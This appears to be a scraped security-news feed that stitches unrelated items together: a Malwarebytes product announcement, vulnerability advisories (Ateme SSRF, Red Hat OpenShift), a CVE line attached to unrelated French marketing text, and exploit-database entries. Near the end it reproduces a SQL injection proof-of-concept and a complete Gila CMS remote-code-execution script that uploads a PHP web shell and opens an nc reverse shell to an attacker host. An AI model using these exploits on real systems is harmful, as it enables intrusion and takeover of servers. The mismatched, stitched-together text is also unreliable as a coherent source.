Categories: Personal
Tags: Malwarebytes

Tags:  Browser Guard

Tags:  Premium

Tags:  new features

Malwarebytes Browser Guard introduces three new features: Content control, import & export, and historical detection statistics



(Read more...)




The post Malwarebytes Browser Guard introduces three new features appeared first on Malwarebytes Labs.

Malwarebytes Browser Guard is our free browser extension for Chrome, Edge, Firefox, and Safari that blocks unwanted and unsafe content, giving users a safer and faster browsing experience. It's the world’s first browser extension to do this while also identifying and stopping tech support scams. 

An often heard misconception is that people think they don’t need Browser Guard since they already have Malwarebytes Premium or a firewall, but since Browser Guard comes in the form of a browser extension it can offer protection to the browser that other means of protection do not have access to.

This is also true the other way around: It can only protect the browsers that have it installed as an extension. It can’t protect other parts of the system or other applications. So while there is an overlap, you need both to optimize protection.

**New features**

The Malwarebytes engineers have been hard at work to make Browser Guard even better, and we can now announce three new features for Premium users:

*   Content Control: With this, you can dial up your control of your browsing experience and define what’s appropriate for you. Fully customize the content you want to block while you - or your kids - are browsing.
*   Import and Export: Use your preferences and customized rules with all your browsers, even on other devices. This helps you to experience a consistent and clean web experience. Discover on this video how to transfer Malwarebytes Browser Guard settings to another browser.
*   Historical Detection Statistics: View past detections and see what we’ve protected you from.  

 

Please note that these new features are only available for Windows systems.

Malwarebytes Browser Guard introduces three new features

Categories: News
Tags: week

Tags:  security

Tags:  July 2023

A list of topics we covered in the week of July 3 to July 9 of 2023



(Read more...)




The post A week in security (July 3 - 9) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows Antivirus

Mac Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

Malwarebytes for iOS

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (July 3 - 9)

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 30 and July 7. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for June 30 to July 7

Authenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Titan File video transcoding software. The application parses user supplied data in the job callback url GET parameter. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP/DNS/File request to an arbitrary destination. This can be used by an external attacker for example to bypass firewalls and initiate a service, file and network enumeration on the internal network through the affected application.

Title: Ateme TITAN File 3.9 Job Callbacks SSRF File Enumeration  
Advisory ID: ZSL-2023-5781  
Type: Local/Remote  
Impact: Exposure of System Information  
Risk: (3/5)  
Release Date: 07.07.2023

**Summary**

TITAN File is a multi-codec/format video transcoding software, for mezzanine, STB and ABR VOD, PostProduction, Playout and Archive applications. TITAN File is based on ATEME 5th Generation STREAM compression engine and delivers the highest video quality at minimum bitrates with accelerated parallel processing.

**Description**

Authenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Titan File video transcoding software. The application parses user supplied data in the job callback url GET parameter. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP/DNS/File request to an arbitrary destination. This can be used by an external attacker for example to bypass firewalls and initiate a service, file and network enumeration on the internal network through the affected application.

**Vendor**

Ateme - https://www.ateme.com

**Affected Version**

3.9.12.4  
3.9.11.0  
3.9.9.2  
3.9.8.0

**Tested On**

Microsoft Windows  
NodeJS  
Ateme KFE Software

**Vendor Status**

\[22.04.2023\] Vulnerability discovered.  
\[23.04.2023\] Vendor contacted.  
\[06.07.2023\] No response from the vendor.  
\[07.07.2023\] Public security advisory released.

**PoC**

ateme\_ssrf.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[07.07.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Ateme TITAN File 3.9 Job Callbacks SSRF File Enumeration

SQL injection vulnerability found in PrestaShop lekerawen_ocs before v.1.4.1 allow a remote attacker to gain privileges via the KerawenHelper::setCartOperationInfo, and KerawenHelper::resetCheckoutSessionData components.

*   Logiciel de caisse
*   Site web e-commerce
*   Pilotage de l’activité
*   Outils marketing
*   Outils de communication
*   DÉMO

Avec le **logiciel de caisse PrestaShop**, votre caisse enregistreuse dépasse les frontières physiques de votre magasin et devient le centre névralgique de votre activité. Avec le module KerAwen, vous possédez tous les outils et informations vous permettant de proposer une offre personnalisée à chacun de vos clients, mais aussi de bien gérer vos stocks. En plus, la **caisse enregistreuse** compatible Prestashop peut vous suivre partout pour renseigner votre clientèle en magasin ou réaliser un encaissement « sofa ».

Le logiciel de caisse PrestaShop Kerawen est **conforme et certifié** avec la nouvelle norme 2018.

Notre caisse Pos KerAwen est 100 % compatible avec un **site e-commerce** PrestaShop, mais elle l’est aussi avec d’autres CMS comme Shopify et WooCommerce.

_Logiciel de caisse prestashop intuitif, nomade et puissant.  
Offrez une nouvelle expérience à vos clients, réinventez le métier de vendeur._

**Module de caisse PrestaShop : un outil d’aide à la vente inédit**

*   *   *   **Comptes client** : création en quelques clics, reconnaissance des clients et visualisation immédiate de leur historique d’achats magasin, web et mobile. D’un simple clic, le vendeur peut consulter les articles vus sur son site e-commerce, la wishlist, le CA des 12 derniers mois, le panier moyen, les paniers abandonnés…

*   *   *   **Catalogue produits** : création, édition, modification et visualisation des fiches produit (prix, stocks, descriptifs, recommandations…)

*   *   *   **Marketing** : édition de _coupons promotionnels_, mise en place de programmes personnalisés de _fidélité_ et de _parrainage_

**Notre caisse PrestaShop est aussi un gestionnaire de commandes**

*   *    Notifications automatiques des commandes web sur la caisse

*   *   Gestion des commandes clients en temps réel (changement d’état et retrait en magasin)

*   *   Bientôt, la prise de commande avec choix entre retrait en magasin et livraison à domicile depuis la caisse

**Un logiciel de caisse PrestaShop lié à une technologie simple et économique**

*   *   *   **Conservez votre matériel informatique** : compatible avec les systèmes d’exploitation Windows, Mac, Linux… et avec tous les devices (ordinateurs, tablettes et téléphones mobiles), notre logiciel de caisse PrestaShop nécessite uniquement un navigateur (Firefox, Chrome, Safari, Opera). La solution KerAwen est aussi compatible avec les douchettes USB et les imprimantes supportant le protocole ESC/POS, soit la plupart des imprimantes du marché.

**Une caisse enregistreuse Prestashop avec les meilleures fonctionnalités**

Multi paiement : espèces, ticket-restaurant, carte-cadeau, carte, paiement différé…

Gestion des devis omni-canal : un devis créé en caisse peut être transformé en commande en ligne par votre client

Fidélité : compte commun au web et au magasin, transformation d’achat

Carte-cadeau omni-canal : une carte-cadeau vendue en magasin peut être utilisée sur le site ou vice versa

Ticket de caisse & facture : impression, envoi par e-mail et disponible en ligne

Remise catalogue ou vendeur (article ou panier)

Avoir : génération avec code-barres, utilisable en caisse ou en ligne, anonyme ou nominatif

Coupons : code-barres, automatique ou discrétionnaire vendeur

Clôture de caisse, dépôt et remise d’espèces

Journaux : CA, encaissement et TVA des points de fidélité en bons

Mise en attente et rappel panier

Afficheur client 2 lignes ou écran incluant photo publicité

Génération et impression des codes-barres

CVE-2023-27845: Logiciel de caisse PrestaShop, caisse enregistreuse POS

Cross Site Request Forgery (CSRF) vulnerability in MultiTech Conduit AP MTCAP2-L4E1 MTCAP2-L4E1-868-042A v.6.0.0 allows a remote attacker to execute arbitrary code via a crafted script upload.

CVE-2023-25201: Security Advisories - usd HeroLab

Red Hat Security Advisory 2023-3925-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.23.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenShift Enterprise security update  
Advisory ID:       RHSA-2023:3925-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3925  
Issue date:        2023-07-06  
CVE Names:         CVE-2022-41717 CVE-2022-41724 CVE-2022-41725  
                   CVE-2022-46663 CVE-2023-0464 CVE-2023-0465  
                   CVE-2023-0466 CVE-2023-1255 CVE-2023-2650  
                   CVE-2023-2700 CVE-2023-3089 CVE-2023-24329  
                   CVE-2023-24534 CVE-2023-24536 CVE-2023-24537  
                   CVE-2023-24538 CVE-2023-24540 CVE-2023-27561  
                   CVE-2023-32067  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.12.23 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.12.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.12.23. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:3924

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html  
Security Fix(es):

* openshift: OCP does not use FIPS-certified cryptography(CVE-2023-3089)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.12 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

You can download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
can be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:2309578b68c5666dad62aed696f1f9d778ae1a089ee461060ba7b9514b7ca417

(For s390x architecture)  
The image digest is  
sha256:571f9da5ab8ad0291a5fa822bd7b2803d5bf53096b140407ac442acf9dde4a99

(For ppc64le architecture)  
The image digest is  
sha256:9470deef9f3220fa1c05b555f5e10f448d2888e60f40a8e2073424dc6e672fd1

(For aarch64 architecture)  
The image digest is  
sha256:d9998b576ab98dcfd9024927572f698c0f40bf7fe4f8eff287f41ab4fa5e9c93

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-10386 - [RHOCP 4.12] MetalLB operator should be able to run other than default service account  
OCPBUGS-11199 - Azure: UPI: Fix storage arm template to work with Galleries and MAO  
OCPBUGS-11303 - Incorrect domain resolution by the coredns/Corefile in Vsphere IPI Clusters | openshift-vsphere-infra  
OCPBUGS-13778 - kuryr-controller crashes on KuryrPort cleanup when subport is already gone: Request requires an ID but none was found  
OCPBUGS-13891 - CNO doesn't handle nodeSelector in HyperShift  
OCPBUGS-13940 - [4.12] Bootimage bump tracker  
OCPBUGS-14041 - Routes are not restored to new vNIC by hybrid-overlay on Windows nodes  
OCPBUGS-14190 - When Creating Sample Devfile from the Samples Page, Topology Icon is not set  
OCPBUGS-14652 - disable debug pporf with unauthenticated port  
OCPBUGS-14664 - When installing SNO with bootstrap in place it takes CVO 6 minutes to acquire the leader lease  
OCPBUGS-14803 - KCM is not aware of the AWS Region ap-southeast-3  
OCPBUGS-14873 - Hypershift operator should honor 'hostedcluster.spec.configuration.ingress.loadBalancer.platform.aws.type'  
OCPBUGS-14958 - [release-4.12] Stalld continually restarting  
OCPBUGS-15099 - visiting Configurations page returns error Cannot read properties of undefined (reading 'apiGroup')  
OCPBUGS-15198 - CPMS: Surface cpms vs machine diff  
OCPBUGS-15269 - External PKI reconcilation deploys broken due to invalid dependency on additional user ca bundles  
OCPBUGS-15309 - Bump to kubernetes 1.25.11  
OCPBUGS-15315 - IngressVIP getting attach to two nodes at once  
OCPBUGS-15377 - [4.12] Cleanup Tech debt: remove unused repo code  
OCPBUGS-15414 - (release-4.12) gather "gateway-mode-config" config map from "openshift-network-operator" namespace  
OCPBUGS-15424 - [4.12z] Duplicate acls cause network policy failure for namespaces with long names (>61 chars)  
OCPBUGS-15429 - [4.12 clone] openshift_ptp_clock_class is not updated in Prometheus metrics when the incomming ptp packets clock class is changed  
OCPBUGS-15459 - [release-4.12] gather podDisruptionBudget only from openshift namespaces  
OCPBUGS-15482 - [CI Watcher] Broken pipeline-plugin e2e tests: PipelineResource CRD isn't installed anymore

6. References:

https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-41724  
https://access.redhat.com/security/cve/CVE-2022-41725  
https://access.redhat.com/security/cve/CVE-2022-46663  
https://access.redhat.com/security/cve/CVE-2023-0464  
https://access.redhat.com/security/cve/CVE-2023-0465  
https://access.redhat.com/security/cve/CVE-2023-0466  
https://access.redhat.com/security/cve/CVE-2023-1255  
https://access.redhat.com/security/cve/CVE-2023-2650  
https://access.redhat.com/security/cve/CVE-2023-2700  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-24534  
https://access.redhat.com/security/cve/CVE-2023-24536  
https://access.redhat.com/security/cve/CVE-2023-24537  
https://access.redhat.com/security/cve/CVE-2023-24538  
https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/cve/CVE-2023-27561  
https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkpuNUAAoJENzjgjWX9erEG+MP/i99EGZdA3rIby9AEtGWYRRA  
ISDGhB/9/pIij2jSQQbESkgse94tecBD8r0qhBd1iPbgzoeTyyL96hieIIg19ici  
iTlzNc+HtEVy0B510xXW0ILtvG61UIbA94LCI9849YISYN5+nxWfPUyn9lpAaytr  
60SeX7vDtjC0/O3XRsOT6hvCvMrlHVd5t0TR6SAMeRi7mjNQM8l9t+Qf5uIwsM+s  
itaNLWbca438pRwBZ4XRuBotbUdWCgoqT+nFrAXWMAGLCF+iyqMAzr65NwQjc9Zd  
9QVb/ez/eQiyrhr4hyBP0nqgaFRVPFZc3arUuOp7jVswxE6OR5nNKFS8xh7hQETs  
w0EZXIiuR9GODqeazxN33q9of1FGBreijDAljU+80HNlgGI69/D68Oyozgo9rP86  
Kf78FW0+OkHUFhksXz1SQBw48+yOGUOep0qRArcHS3UxzFwA+fS1oTGXmKhRtpcf  
6A/ADG0+91d3Waq2scpjWmSe9f9psjv2akFlEgp/c5CB5L+FAaxKEAiefz/RfETs  
Vda/QhO4kMjbYfbXkvmg5AGxB5de27aE9sZyK48cDMm8EPfO2iMuOVsF+Ce+oa87  
EhHrZVX4+BGKb3VgTX0p3Yzo6ArDieZkaM+JTdSb+iV/RpCwm9/FUPs6D1akdMzj  
dH9Z0dCgnuVydYdAlenW  
=rbDJ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3925-01

Lost and Found Information System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Lost and Found Information System v1.0 - SQL Injection# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : webapps# Dork : /php-lfis/admin/?page=system_info/contact_information# Tested on: Windows/Linux# CVE : CVE-2023-33592import requests# URL of the vulnerable componenturl = "http://example.com/php-lfis/admin/?page=system_info/contact_information"# Injecting a SQL query to exploit the vulnerabilitypayload = "' OR 1=1 -- "# Send the request with the injected payloadresponse = requests.get(url + payload)# Check if the SQL injection was successfulif "admin" in response.text:    print("SQL injection successful!")else:    print("SQL injection failed.")

Lost And Found Information System 1.0 SQL Injection

Gila CMS version 1.10.9 suffers from a remote code execution vulnerability.

    # Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)# Date: 05-07-2023# Exploit Author: Omer Shaik (unknown_exploit)# Vendor Homepage: https://gilacms.com/# Software Link: https://github.com/GilaCMS/gila/# Version: Gila 1.10.9# Tested on: Linuximport requestsfrom termcolor import coloredfrom urllib.parse import urlparse# Print ASCII artascii_art = """ ██████╗ ██╗██╗      █████╗      ██████╗███╗   ███╗███████╗    ██████╗  ██████╗███████╗██╔════╝ ██║██║     ██╔══██╗    ██╔════╝████╗ ████║██╔════╝    ██╔══██╗██╔════╝██╔════╝██║  ███╗██║██║     ███████║    ██║     ██╔████╔██║███████╗    ██████╔╝██║     █████╗  ██║   ██║██║██║     ██╔══██║    ██║     ██║╚██╔╝██║╚════██║    ██╔══██╗██║     ██╔══╝  ╚██████╔╝██║███████╗██║  ██║    ╚██████╗██║ ╚═╝ ██║███████║    ██║  ██║╚██████╗███████╗ ╚═════╝ ╚═╝╚══════╝╚═╝  ╚═╝     ╚═════╝╚═╝     ╚═╝╚══════╝    ╚═╝  ╚═╝ ╚═════╝╚══════╝                              by Unknown_Exploit"""print(colored(ascii_art, "green"))# Prompt user for target URLtarget_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")# Extract domain from target URLparsed_url = urlparse(target_url)domain = parsed_url.netloctarget_url_2 = f"http://{domain}/"# Prompt user for login credentialsusername = input("Enter the email: ")password = input("Enter the password: ")# Create a session and perform loginsession = requests.Session()login_payload = {    'action': 'login',    'username': username,    'password': password}response = session.post(target_url, data=login_payload)cookie = response.cookies.get_dict()var1 = cookie['PHPSESSID']var2 = cookie['GSESSIONID']# Prompt user for local IP and portlhost = input("Enter the local IP (LHOST): ")lport = input("Enter the local port (LPORT): ")# Construct the payloadpayload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"# Perform file upload using POST requestupload_url = f"{target_url_2}fm/upload"upload_headers = {    "Host": domain,    "Content-Length": "424",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",    "Accept": "*/*",    "Origin": target_url_2,    "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",    "Connection": "close"}upload_data = f'''------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"Content-Type: application/x-php<?php system($_GET["cmd"]);?>------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="path"tmp------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="g_response"content------WebKitFormBoundarynKy5BIIJQcZC80i2--'''upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)if upload_response.status_code == 200:    print("File uploaded successfully.")    # Execute payload    response = session.get(payload_url)    print("Payload executed successfully.")else:    print("Error uploading the file:", upload_response.text)

Gila CMS 1.10.9 Remote Code Execution

DANGEROUS MAILER-CLONED version 2.0 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : DANGEROUS MAILER-CLONED V2.0 information disclosure Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://thefortune39.company.site/CLONED-VERSION-OF-DANGEROUS-MAILER-p199233403                                    || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] all users and passwords saved as clear text[+] use payload : /storage/info.txt[+] login : /login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#windows